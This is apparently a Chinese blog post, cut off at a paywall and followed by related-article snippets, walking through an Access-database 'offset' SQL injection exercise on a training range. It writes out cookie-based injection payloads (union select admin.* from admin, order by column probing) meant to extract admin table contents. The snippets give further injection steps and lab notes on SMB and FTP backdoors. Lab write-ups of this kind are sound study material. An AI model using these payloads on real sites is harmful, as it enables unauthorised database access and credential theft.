偏移注入靶场练习

最新推荐文章于 2022-07-08 22:26:28 发布
最新推荐文章于 2022-07-08 22:26:28 发布
阅读量1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60777183/article/details/120055501
本文介绍了在靶场环境中进行SQL注入实战的过程,通过调整SQL语句,逐步发现注入点和隐藏字段。通过二分法确定表的字段数,并利用数字后缀法找出所有隐藏的注入点,最终揭示了admin表的部分信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

document.cookie= “id=”+escape(“171 union select 1,2,3,4,5,6,7,8,9,admin. from admin”)
提示数据库报错,
一直减到:
document.cookie= “id=”+escape(“171 union select admin. from admin”)
仍然提示数据库报错。
说明注入点查询的表的字段数小于admin表中的字段数。

ps:漏洞不可能只存在一个,因为开发者开发思路是一样的,一般来说相似的漏洞会在同一个网站频繁出现。
在靶场产品中心的某个产品页面试下:
http://kypt8004.ia.aqlab.cn/ProductShow.asp?ID=105
document.cookie=”id=”+escape(“105 order by 1”) 页面正常
document.cookie=”id=”+escape(“105 order by 100”) 找不到此产品!
通过二分法不停找,发现26个字段。
document.cookie=”id=”+escape(“105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin”)
可见3,5,7为注入点。
其实25也是注入点,隐藏在图片里。
那么,怎样才能把所有隐藏点都找到呢?
每个数字后面加一串容易辨识的长数字(随便什么数字),比如:
document.cookie=”id=”+escape(“105 union select 177777,277777,377777,477777,577777,677777,777777,877777,977777,1077777,1177777,1277777,1377777,14777

最低0.47元/天 解锁文章

200万优质内容无限畅学
Access偏移注入靶场作业
weixin_45540609的博客
04-19 444
因为ID=104和ID=105-1时页面显示内容一样,因此判断存在sql注入 不断order by 1,2,3,······,26,到27时,页面无法正常显示,则说明字段有26个 把cookie的名称设置为ID,值设置成105,把url栏里面?ID=105删除,刷新,则说明cookie优先级高于get 把cookie值设置成105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2.
WEB攻防-通用漏洞-SQL注入-ACCESS一般注入偏移注入
最新发布
weixin_45534587的博客
07-11 1153
同样的使用union select来做,不同的是不需要知道列名,而是通过偏移爆出数据,但前提是查询的表必须比当前查询到的列数小,如该案例在上文中查询到22列,则如果要查询admin表的列数必须比当前查询的22列的列数少,因为要把查询到表塞进当前查询到列中,不理解往下看例子。union select 1,2,3,4,5,6,7,8,9,10,11,admin.* from admin --回显错误。在偏移6位之后回显正常,则知道admin有6列 ,而3和15是回显位,这里选择使用15回显。
[zkaq靶场]SQL注入--access数据库-偏移注入
wwxxee
05-09 487
Access注入偏移注入 适用场景: 当使用select * from admin与select admin.* from admin等价时,就可以在不知道字段名的情况下获取数据。 union select 1,2,3,admin.* ,4,5,6 from admin 通过偏移admin.*的位置来获得不同字段的数据,这时就不需要知道字段名了。 靶场 该处的sql注入为access数据库-cookie注入的漏洞点。 偏移注入的漏洞点在: 由于admin表里新增了一个字段,无法通过爆破得出,所以在此处
access偏移注入
baynk的博客
06-07 3307
记录总结偏移注入的使用方法。 为什么要用偏移注入 偏移注入是access比较独有的一种注入手段,很有特点(人品。。)的注入方式,一般用于在猜出了表名但是没有猜出列名的情况下使用。 偏移注入的使用 目前猜测出了表名,但是怎么都猜不出列名,使用联合查询法来进行偏移注入。 接下来测出偏移量,其实这个偏移量就是admin这张表的列的个数。直接将22改成*号,测试是否回显正常,不正常就一直往前减,一...
渗透测试基础-Access数据库之偏移注入
weixin_45488495的博客
04-12 550
渗透测试基础-Access数据库之偏移注入偏移注入漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 偏移注入 偏移注入的应用场景是,当这个地方我们有了表名,但是字段名始终弄不来的使用方法。 先来了解一些数据库小知识 select * from school 代表的是查询school表里面的所有数据(如图) 但其实我们可以换其他的写法,来达到相同的查询效果 select school.* from school 所以咱们这里的
16、注入篇--偏移注入(Access)
无他,惟手熟尔
04-10 508
偏移注入也称移位溢出 使用场景 知道表名,不知道字段名 注入点的字段数要大于需要查询的表名字段数 注入流程 order by 判断字段数 猜测表名 and exists(select * from 表名) 开始偏移注入 注意: select username,password from admin ===>select * from admin ===>select admin.* from admin 库名.表名.字段名 靶场 1、进入靶场,观察ID进行了传递参数,探测id是否可以注
Access偏移注入利用-01
09-15
Access偏移注入利用-01
Access偏移注入
10-02
### Access偏移注入详解 #### 一、Access偏移注入概念与原理 Access偏移注入是一种针对Microsoft Access数据库的特殊SQL注入技术。这种技术利用了Access数据库在处理SQL语句时的一些特性,允许攻击者通过构造特殊...
适用于ACCESS和MySQL数据库的偏移注入
qq_42097777的博客
04-01 495
## 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询,偏移注入同样如此 # 偏移注入还要用到"table.*" 他的意思是代表了表里的所有字段 ###运用场景是:权限不足无法获取系统表内的信息,和工具无法查出字段 先判断是否有注入点,靶场第一题,用url传参被拒绝,采用cookie进行传参 1.利用and1=1 显示正常, and 1=2 显示错误页面。证明有...
Access偏移注入检测北大分站
0ffs3t
11-30 1490
Access偏移注入检测北大分站 2011-10-01 22:25 Access偏移注入检测北大分站 作者:莫良 来自BHST.org 0x00 大清早朋友丢来一站要我看,反正蛋疼厉害,就帮帮他呗。一看,哇靠北大分站,上跳板,我们来给他安全检测一番.具体没什么技术含量,高手飘过。 0x01 简单在首页试了几个可能存在注入的链接都失
cracer安全学院内部练习靶场
04-13
这是最新大佬分享出来的靶机下载地址,是最新的cracer大佬的靶机地址,解压密码在压缩包内打开即可看到解压密码。希望大家能够希望
Access数据库注入偏移注入
seek_2022的博客
05-02 3006
文章目录一、偏移注入使用场景二、必要的SQL知识补充(一)admin.*是什么意思?(二)联合查询的字段数问题(三)access如何查询指定数据?三、靶场实战(一)判断是否存在cookie注入(二)爆破表名(三)判断当前页面显错位(四)查询admin表字段数(五)偏移注入查询flag 一、偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。像Sqlmap之类的工
靶场(2)
HJWYYQX的博客
06-08 778
SMB信息泄露 首先,先查看攻击机IP 然后,通过扫描得到靶机IP,并且可以知道靶机开放了SMB服务。 有SMB服务,我们可以 尝试使用空口令登录(提示输入密码直接空密码) 发现一个打印驱动、一个共享文件夹share$和一个空链接。 ls查看共享的文件夹。share$里发现许多敏感文件,用get下载下来到本地查看,其中deet.txt泄露了一个密码12345; 然后在共享文件夹里边还有...
[4] SQL 注入(七月最佳)
Debroon
12-02 2016
SQL 注入十分普遍,新闻➡️《报告称 超 6 成 Web应用程序攻击来自SQL注入》。 如上所述,SQL注入攻击 或 SQLi 是一种通过将恶意SQL语句插入其输入字段以供执行来利用SQL语句的基础漏洞的方法。 起于 1998 年一名叫 Rfp 的黑客发表的一篇文章。 从那时起,TA主要针对零售商和...
靶场(3)
HJWYYQX的博客
06-15 341
FTP服务后门 同样开始用netdiscover发现靶机ip后,用nmap探测开启的端口或服务。 发现开启了ssh,http和ftp这三个服务。 我们发现了ftp的版本号,我们可以使用seachsploit来查看对应的版本该服务有没有可利用的漏洞。 发现了利用漏洞,并且列出了集成利用方式(Metasploit)和利用代码位置(15662.txt) 接下来使用Metasploit进行溢出(...
sql 时间函数大全
热门推荐
04-24 1万+
1.        当前系统日期、时间    select getdate()2. dateadd  在向指定日期加上一段时间的基础上,返回新的 datetime 值  例如:向日期加上2天  select dateadd(day,2,2004-10-15)  --返回:2004-10-17 00:00:00.0003. datediff 返回跨两个指定日期的日期和时间边界数。  se
【SQL注入】cookie注入:原理、步骤、示例
07-08 6777
【SQL-cookie注入
cookie注入
笔墨稠思
11-25 2561
靶场地址:http://kypt8004.ia.aqlab.cn/shownews.asp?id=171 在这个靶场的新闻中心中,我们发现url中带有id参数,尝试试探是否存在sql注入,通过在参数后面添加 and 1=1 发现这里经过了特殊处理,被过滤了,所以尝试其他突破点,将参数放入cookie中去尝试是否有效 发现cookie中也可以携带参数,尝试是否存在sql注入,在cookie中写入id 171 and 1=1 发现页面正常,之后将 id的值改为 171 and 1=2 发现页面出现问
小数化分数2
qq_32925781的博客
05-08 3541
小数化分数2题目Problem Description Ray 在数学课上听老师说,任何小数都能表示成分数的形式,他开始了化了起来,很快他就完成了,但他又想到一个问题,如何把一个循环小数化成分数呢? 请你写一个程序不但可以将普通小数化成最简分数,也可以把循环小数化成最简分数。 Input 第一行是一个整数N,表示有多少组数据。 每组数据只有一个纯小数,也就是整数部分为0。小数的位数不超过
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值